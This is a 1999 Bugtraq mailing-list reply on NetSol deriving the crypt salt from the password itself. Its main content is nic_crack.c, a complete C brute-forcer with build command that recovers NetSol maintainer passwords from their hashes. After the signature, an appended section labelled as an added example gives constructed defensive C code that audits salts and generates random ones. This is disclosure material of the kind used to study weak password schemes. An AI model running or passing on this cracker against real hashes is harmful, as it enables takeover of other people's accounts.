Bugtraq mailing list archives

Re: Insecure handling of NetSol maintainer passwords


From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Wed, 10 Nov 1999 14:49:58 -0800


I couldn't resist doing a proof-of-concept, however I take no responsibility for cracking your own
password.  It takes a while to run on fairly standard passwords.  Please don't bombard me with
'haX0r d00d' requests, like the Frontpage thing.

--Perry

Compiles on RH6.0 with:

gcc -O -funroll-loops -o nic_crack nic_crack.c -lcrypt

---------------------------------------------------8<-------------------------------------------------

/* nic_crack.c - brute forces Netsol encrypted NIC update passwords */

#define _XOPEN_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>

/* Laid out so that the struct itself is the candidate password string:
 * the salt (first two characters of the hash, which under NetSol's scheme
 * are also the first two characters of the password), six guessed
 * characters, and a terminating NUL. All members are char, so there is
 * no padding and (char *)&thekey is a valid C string. */
struct key {

char    a[2];
char    b, c, d, e, f, g;
char    term;

};

int main(int argc, char *argv[])
{

        char            *passwd;
        char            *crypted;
        struct  key     thekey;
        char            first[3];
        int             b,c,d,e,f,g;

        if (argc<2) {
                fprintf(stderr,"usage: nic_crack <crypted password>\n");
                exit(1);
        }

        passwd = argv[1];

        thekey.term = '\0';

        /* The salt is the first two characters of the stored hash; because
         * NetSol uses the password as its own salt, those are also the first
         * two characters of the password, so only six positions are searched. */
        strncpy(first, argv[1], 2);
        first[2] = 0;
        strncpy(thekey.a, argv[1], 2);

        /* Each position runs through 0..126; a 0 terminates the key early,
         * so passwords shorter than eight characters are covered as well. */
        for (g = 0; g < 127; g++) {
                thekey.g = g;

                for (f = 0; f < 127; f++) {
                        thekey.f = f;

                        for (e = 0; e < 127; e++) {
                                thekey.e = e;

                                for (d = 0; d < 127; d++) {
                                        thekey.d = d;

                                        for (c = 0; c < 127; c++) {
                                                thekey.c = c;

                                                for (b = 0; b < 127; b++) {
                                                        thekey.b = b;

                                                        crypted = crypt((char *)&thekey, first);

                                                        /* crypt() returns NULL for a salt it
                                                         * cannot use; never strcmp() that. */
                                                        if (crypted != NULL && strcmp(crypted, passwd) == 0) {
                                                                printf("Found: %s\n", (char *)&thekey);
                                                                return 0;
                                                        }
                                                }
                                        }
                                }
                        }
                }
        }

        return 0;
}

---------------------------------------------------8<-------------------------------------------------
> through crypt(), but the first two characters of the encrypted value (the salt)
> are the same as the first two characters of the password, indicating they use
> the password as its own salt. This dramatically limits the usefulness of
>
> --
> Jefferson Ogata <jogata () nodc noaa gov> National Oceanographic Data Center
> You can't step into the same river twice. -- Herakleitos



--
Perry Harrington                 Director of                   zelur xuniL  ()
................             System Architecture               Think Blue.  /\
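The mitigation for the weakness Jefferson describes (a salt taken from the password itself), as an added example that is not from Perry's post or from NetSol's code: an audit check that flags a stored crypt(3) hash whose salt is the password prefix or lies outside the crypt salt alphabet, beside a salt generator that draws from /dev/urandom instead. The function names, the enum and the sample hashes are constructed for this example.

```c
/* salt_audit.c - added example, not from Perry's post or NetSol's code:
 * the mitigation for a salt derived from the password itself. */
#include <stdio.h>
#include <string.h>

/* The 64 characters a crypt(3) salt may contain. */
static const char SALT_ALPHABET[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

enum salt_problem { SALT_OK = 0, SALT_BAD_CHAR = 1, SALT_IS_PASSWORD_PREFIX = 2 };

/* Audit a stored crypt(3) hash against the plaintext at set/change time.
 * SALT_IS_PASSWORD_PREFIX: salt == first two password characters (the NetSol
 *   scheme): the hash leaks the prefix and equal passwords hash identically.
 * SALT_BAD_CHAR: salt characters crypt(3) does not define, which is what a
 *   password-derived salt yields for a password such as "!secret". */
enum salt_problem audit_salt(const char *hash, const char *password)
{
    if (strlen(hash) < 2 ||
        !strchr(SALT_ALPHABET, hash[0]) || !strchr(SALT_ALPHABET, hash[1]))
        return SALT_BAD_CHAR;
    if (strlen(password) >= 2 && hash[0] == password[0] && hash[1] == password[1])
        return SALT_IS_PASSWORD_PREFIX;
    return SALT_OK;
}

/* The fix: a two-character salt from /dev/urandom, independent of the
 * password. Returns 0 on success, -1 if the random source is unavailable. */
int make_random_salt(char salt[3])
{
    unsigned char rnd[2];
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    size_t n = fread(rnd, 1, sizeof rnd, f);
    fclose(f);
    if (n != sizeof rnd)
        return -1;
    salt[0] = SALT_ALPHABET[rnd[0] & 63];
    salt[1] = SALT_ALPHABET[rnd[1] & 63];
    salt[2] = '\0';
    return 0;
}
```

On the constructed hash "pa5JrZ1zQ7sXk" for password "passw0rd" audit_salt returns SALT_IS_PASSWORD_PREFIX, while "XkGsb8Eq0hPn." (independent salt "Xk") returns SALT_OK.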


